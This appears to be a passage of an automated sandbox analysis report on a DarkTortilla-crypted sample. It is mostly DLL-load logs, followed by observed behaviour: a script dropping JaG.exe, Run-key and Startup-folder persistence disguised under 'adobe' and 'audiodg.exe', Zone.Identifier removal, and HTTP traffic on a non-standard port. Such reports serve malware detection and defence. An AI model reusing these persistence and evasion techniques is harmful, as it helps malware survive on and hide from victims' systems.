                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: dwrite.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                            Data Obfuscation

                            barindex
                            VBScript performs obfuscated calls to suspicious functions
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\rHMh.js");
                            Yara detected DarkTortilla Crypter
                            Source: Yara matchFile source: 5.2.JaG.exe.4c30000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.JaG.exe.38d1a10.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.JaG.exe.4c30000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.JaG.exe.38d1a10.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2287943742.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2287943742.00000000027F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2287943742.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JaG.exe PID: 8168, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024F0152 push ebx; iretd 5_2_024F0153
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_024FD728 push eax; ret 5_2_024FD731
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F52DB0 push es; ret 5_2_07F52DA0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F52D91 push es; ret 5_2_07F52DA0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F5CBFF pushad ; ret 5_2_07F5CC03
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 5_2_07F52030 push esp; retf 5_2_07F52031
                            Source: JaG.exe.4.drStatic PE information: section name: .text entropy: 6.903609935714846
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\JaG.exeJump to dropped file

                            Boot Survival

                            barindex
                            Creates multiple autostart registry keys
                            Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg.exe
                            Drops script or batch files to the startup folder
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.jsJump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.jsJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.jsJump to behavior
                            Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                            Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg.exe
                            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg.exe

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeFile opened: C:\Users\user\AppData\Local\Temp\JaG.exe\:Zone.Identifier read attributes | deleteJump to behavior
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 6892
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
